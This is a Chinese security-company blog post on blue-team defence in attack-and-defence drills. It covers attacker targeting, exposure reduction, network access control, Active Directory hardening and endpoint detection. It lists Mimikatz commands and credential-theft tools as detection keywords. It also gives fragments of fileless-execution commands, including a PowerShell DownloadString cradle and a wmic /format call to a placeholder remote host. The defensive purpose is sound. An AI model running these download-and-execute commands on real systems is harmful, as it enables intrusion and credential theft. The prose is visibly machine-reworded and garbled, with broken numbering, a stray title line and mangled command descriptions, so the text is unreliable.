复查网站_渗透测试项目分析方法

检测维修 0 52

复检网站_渗透测试项目分析手段

近期,我们 Sinesafe 参与其中的几家机构所开展的渗透测试防守方防护方案评估复查事宜,部分防守方欠缺对攻击者的精准认知,攻击者所采用的手法已然较为高超,诸如不进行扫描、不落地、污染日志之类情况都颇为常见。与此同时,也务必要正确认识对手:在攻防演练里,攻击者并非具备一切能力,他们面临着与防御方相同的问题:时间紧迫,任务繁重。因而攻击者的攻击目标、攻击手法也是存有线索可查的,了解彼此状况才能在每场战斗中都取得胜利。

渗透测试

一、知彼

攻击的人同样是讲究成本的,所以,对于防守的一方来讲,最优的策略是,做得比别的防守的一方稍好上一点儿就行,稍好一点儿的意思是,不在档次低的问题上出错误,像是弱密码、互联网应用远程RCE、管理后台暴露、重要服务器没打补丁之类的,对于那种“时间紧迫、任务繁重”的防守那一方而言,构建坚不可摧的防线明显意味着投入大成本,还有最为紧缺的时间,因而,这篇文章不会涵盖所有方面,只挑选性价比高且值得迅速投入的安全举措来跟大家交流。

一般而言,攻击者有着明确的目标,其步骤清晰,会控制成本,还要进行反检测,实施反清理,呈现三流分立的状况。

目标清楚明晰:攻击者仅仅对具备得分条件各类项目发起袭击,以及针对于必需有的途径加以动手(也就是外网进入的地方,还有内网能够借以立足之所在),针对这些具体目标运用高级别方式作事,将会把手脚行为隐蔽掩饰起来加以施行;对于并非必须具有的旁支途径于顺路情形之际所能掌控住当成工具的服务器而言,并不担惊忧虑可能被发觉露馅,运用起来相对比较随性随便,甚至会故意地去制造制造出来声音以达到干扰防御一方的目的。

清晰有序:先进行信息收集,接着控制入口,随后施展横向移动,进而维持权限,最后对目标系统发起攻击。每一步骤皆是经典之操作以及教科书式之手法。

控制成本:

发起攻击时,优先针对具有较高权限的账号展开进攻,像是充当管理职责的人员账号以,及身为目标系统主导人物的账号;还要优先对从事运维工作或者安全相关事务的人员账号以及其使用的终端予以攻击,因为这类人群通常持有服务器的root账号,还有安全设备的管理员账号,凭借这些条件能够实现更深入的操控;再者,要优先对发挥集中管控作用的设施发动攻击,例如域控、进行集中身份认证的系统以及执行终端管理功能的系统,一旦成功攻陷单个此类系统,便能够获取公司内部多数系统的权限;另外,优先攻击作为基础的设施,比如DNS、DHCP、邮件系统、知识分享平台、oa系统以及工单系统;这些系统之中存在内置的具备高权限资格的账号,或者有可能成为帮助攻击者隐匿自身行为痕迹的助力。或许是Git,又或许是SVN等这类开发过程之中用于源代码管理的服务器,可以凭借代码审计的方式,从中发现应用中存在的0day这样的漏洞。

反检测,反清理:

三流分立:

扫描流,其作用是用以大批量进行内网存活 IP 以及漏洞的扫描操作,扫描源一般情况下并不被攻击者予以重视,就算被清除掉,也并不会对攻击计划造成影响,那些高水平的攻击者常常会运用这种扫描行为去分散防守方的精力。数据流,它是用来朝着外网大量传输非关键数据的情形,通常来讲是具备互联网权限的终端或者服务器(其中终端数量较多),很少存在隧道行为或者扫描行为的情况,倘若通过简单的 empire(软件);若存在隧道行为,并且数据传输量很少的话,就会连接若干个 IP 以及域名(以此来避免被外网封禁),传输过程必定会经过加密处理,而且不会使用自签名证书。

在本次攻防实战演习准备阶段,攻击方准备了几十个C2域名。

二、充分了解自身情况做到知己,重中之重是搞清楚防守方防守区域当中的各类资产具体信息情况,以此来进一步缩减暴露层面范围比例。其所遵循的原则情况如下:

那些不使用的系统,对于该卸载的要进行卸载,对于该暂停的要予以暂停。那些不使用的功能,对于该卸载的要进行卸载,对于该暂停的要予以暂停。(平日里其实便应当按照此种模式来开展处理工作,并非是在战时阶段)对于该取消访问权限的就要实施取消操作,能够对访问范围予以限制的则要限制其范围。那些正在使用的,要搞清楚其所具备的功能到底是什么,双流(也就是所谓的数据流和运维流)以供何人去使用,是否具备存在风险的可能性,可不可以通过一键操作来进行处置。

缩小暴露面 1.按资产所属纬度梳理

具有互联网特性的资产,属于分支机构范畴的资产,归属于子公司所有的资产,与外联公司相关联的资产,借助公有云形式存在的资产,担任开发工作的商家,从事外包业务的商家。

容易忽视的:

有关公有云资产,存在这种情况,有的业务部门以及分支机构,它们对公有云的申请通通不经过 IT 部门,然而公有云上面却存放着数量众多的业务数据。还有开发商/外包商的资产,通常情况下,开发商/外包商是给甲方进行外包开发信息系统的,并且开发商/外包商公司内部也会自行搭建 Git/SVN 等源代码管理服务器,在这些服务器里存有已经交付给甲方的信息系统源码,可是开发商/外包商的源码系统管理的安全能力跟甲方比起来,或许就相差好几个量级了。最终导致的后果是:借助获取到的源码,发现系统里面存在应用 0day,进而能够控制甲方已经上线的信息系统。

缩小暴露面 2.按资产属性梳理

着重留意资产的安全特性,具体涵盖:中间件或者框架(版本方面)、于公网开放的 API 接口(尤其是尚未下线的旧接口)、向外网开放的管理后台、具备高风险的功能项(诸如文件上传点、短信验证码、重置密码操作、文件下载途径)、远程接入的节点(虚拟专用网络形式)、拥有特权的账户(包括应用管理特权账户、应用连接账户、系统管理特权账户、能够对账户权限予以修改的账户、备份账户以及高管层账户)。

每一个安全属性都是血的教训。

缩小暴露面 3.忽视点

在所有内部文档服务器上,包含 OA、邮件系统、jira、wiki、知识库等之内,要对敏感信息进行清理或者限制访问权限,且不能存在网络拓扑、安全防护方案以及部署位置、各类密码;于资产管理平台上,蜜罐不能被称作蜜罐,安全设备 IP 需要隐藏;各类口令,比如弱口令、默认口令、已泄露口令。

每一个忽视点都是眼泪的结晶。

安全资产管理,更多内容参加:安全资产管理中容易被忽视的几点

三、防护关键点

将要面临战斗之前,再想要依照大并且全面的方向去梳理一回,几乎没有可能性,最为妥当的做法就是把防护的关键要点浏览一番,一定要记住都要实地去查看一次,不要去相信其他人给出的反馈。

3.1 安全隔离

渗透测试绕过

从实际作战的角度去看,网络层的那种用以控制进行访问的举措,被证实是最为有成效的,此成效体现为,对于攻击者而言,很难达成绕开该控制的情况,故而,不要轻信应用层的那种控制方式。网络层所实施的访问控制,是归属于基础架构安全范畴之内的,它是最为有效且最为重要的,是关乎整个安全防护体系的基础所在。

访问控制策略原则:明细允许,默认拒绝。

从内网前往互联网的访问,管控办公终端时,除了个别协议没办法限制目的 IP 之外,其余的协议全都加以限制,特殊的访问需求,迅速开通。条件允许要考量,终端是无法直接访问互联网的,而需要访问互联网存在两种解决办法,一种是另外分配一台上网终端,另一种是虚拟浏览器办公服务器,特殊访问需求给予开通,默认是拒绝的。

生产网,生产网终端被禁止连通互联网,服务器若有特殊访问需求,其开通仅为默认拒绝后的特殊情况,需另行处理。

用以对互联网提供服务的服务器,其所处位置必须在DMZ,以这种方式实现和内网隔离,进而达成互联网访问其内网的相关需求。

复检网站_渗透测试项目分析手段_eesafe网站安全检测工具 维基百科,_渗透测试攻击者手法分析

3.重要系统的访问控制策略

诸如AD、邮件系统之类的基础设施有着访问控制,千万别小瞧基础设施的ACL访问控制,它可是对抗应用以及系统漏洞的成本最低且最为有效的举措,漏洞不断涌现,只有ACL访问控制效果持久,强烈予以推荐,终端安全管控、自动化运维系统等集中控制系统的后台登录要针对访问来源加以限制,优先运用网络访问控制,其次运用系统层限制,搭配运用应用层限制。

3.2 AD防护

准备阶段

2.加固阶段

对抗权限提升:对域账号进行权限DACL梳理,加固高权限账号

存在这样一种情况,能够用来检测高权限账号呢的方式有两种,一种是采用bloodhound黑客工具去监测,另一种则是借助System Internal Tools的ADExplorer展开检测时,存在如下操作步骤:首先是修改密码,要注意这个修改建议在演习前临近时间进行;接着是调整权限和分组,需要依据账号归属人的权限来调账,进而取消非域管账号的敏感权限;然后是修改分组内不合适人员的账号;再就是敏感账号不允许被委派;还有敏感账号不允许取消Kerberos预鉴权;最后敏感账号的密码强度要符合规定。7)对于具备直接域管权限,或者有间接域管权限的账,比如能将Domain Admins的账号予以修改账,就拥有间接域管权限,针对于这种账号的活动执行报备制度,在演习期间,要是未经允许,就不准进行任何操作,其中涵盖登录等操作。8)办公机在演习前要全部重启,终端在演习前也要全部重启,以此消除敏感账号凭据留存。9)登录服务器去查看相关凭据,要是有凭据,就将其删除,或者通过注销的方式来把服务器上留存的凭据给删除掉。10)参照relay攻击,要在域控上配置LDAP enforce signing。抗衡LDAP relay以及SSRF攻击这一行为,需在域控之上对LDAPS channel binding予以配置。抗衡LLMNR/NBT Poisoning攻击这一情形,要将域内WPAD服务予以关停。

3.检测阶段

渗透测试检测阶段

原则:若域不安全,最佳修复方案是重装。

对于敏感共享目录访问进行监测,此访问涉及不符合常规状态的共享目录,该目录并非SYSVOL文件夹,而是位于AD服务器中,对于其展开专项检测:针对Mimikatz所实施的一系列攻击行为展开检测,Mimikatz借助sysmon进程以进行追踪确认相关情况,其中比较典型的关键字涵括了gentilkiwi (BenjaminDELPY),这是一家公司的名称 ;另外还涵盖了其他一些关键字,像是kerberos::golden、sekurlsa::pth、kerberos::ptt、lsadump::dcshadow、lsadump::dcsync、sekurlsa::logonpasswords、privilege::debug、misc::skeleton ;针对Kerberos所采用的弱加密方式予以检测,其中非AES加密方式的Kerberos票据加密请求呈现出显著的可疑特性 ;针对异常注册表变更开展检查,同时还包括对dump现象留意把握 ,像是DSRMAdminLogonBehavior变更、AdminSDHolder导出、HKLM\SAM内容导出、HKLM\SYSTEM内容导出、HKLM\SECURITY内容导出 ;针对ntdsutil的滥用情形加以检测,存在使用ntdsutil的敏感参数activate instance ntds ;还存在使用ntdsutil的敏感参数set dsrm password ;针对SID history变更情况进行检测,包括账号加入SID History时成功或者失败这两种结果 ;针对lazagne密码提取工具进行特征分析 ,攻击者喜爱运用的其他工具还包括procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get - PassHashes、Wce、psaattack。

3.3 主机防护(终端和服务器)对抗

在攻击者尝试对终端以及服务器去进行控制之际,为了可以绕开常规的杀毒软件,一般而言会用到一些免杀的手段。然而有些免杀手段,像是白利用,还有样本不落地执行,因为极为稳定且高效,更是受到众多攻击者的喜爱。

执行下载 Powershell IEX 组建,该组建在内存中执行,不会落到硬盘上。

借助代码示例:powershell.exe,它处于不显示进程的状态,并且以隐藏方式运行 ,还执行这样一串代码:IEX ,这串中的某个部分是:((new-object net.webclient).downloadstring( AND “(New-Object Net.WebClient).DownloadString“。

2.Windows系统白文件利用(wmic.exe

运用代码示例,cmd/c,通过wmic os get,采用/format:”\\x.x.x.x\1.xsl”这种形式,并且start/wait notepad ,有这样的操作。

监测的特征是,“wmic os get”,还有“/format”,3.Windows系统白文件利用,也就是(csc.exe)。

利用代码示例:

将“C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe”,以“/noconfig”,按照“/fullpaths”模式,对应指向“C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline”。

进行监测时所具有的特征是:存在“csc.exe”,并且存在(“/r:System.EnterpriseServices.dll”或者“/unsafe”)这点,Windows系统中白文件利用方面(msiexec.exe)。

特点是,被被动执行,于后台执行着的参数,存在一定程度的误报率,要请自行去进行研究,不会再列举示例。

5.检测certutil白利用

特征:常见绕防火墙使用的参数。请自行研究,不再举例。

6.检测通过url.dll来进行不落地执行

请自行研究,不再举例。

3.4 账户和权限对抗

不论权限高低,一概进行清理,严格限定使用范围,每一次使用完毕之后都要加以确认。应用权限借助日志分析来检测是否存在滥用情况。要留意备份账户以及可修改权限账户的使用状况。终端每隔24小时就重启一回。(以此对抗终端权限抓取类攻击)

3.5 瞬间死亡

瞬间死亡有两种方式:路径打穿、系统打穿。

3.5.1 路径打穿

径直从压根儿就没想过(毫无防备)的路线侵袭过来。邮件乃是操控终端的首要选取入口,具体的防护办法能够参照《企业安全建设指南:金融行业安全架构与技术实践》的第16章:邮件安全。

边缘网涵盖无线以及自助终端,其中自助终端包含打卡机、自动售卖机、会议室设备、ATM机还有排队机等等。对无线以及自助终端网络与内网访问予以限制。

限制分支机构、外联公司等网络和总部的网络访问。

要晓得,别去轻信那种处于理论范畴内无法达成全部连通,然而在实际情况里却存有能够实现全部连通的内部网络的系统。(死于方便性)

3.5.2 系统打穿

遭系统打穿,全是血泪史,只因我们老是忘了这些最大风险源。优先去攻击中心化系统,以及跨两网的系统,其中包含终端安全管控控制台,此控制台安全防护能力极弱,运维管理系统,Zabbix,Nagios,堡垒机等、单点登录SSO系统、AD活动目录。

相关推荐: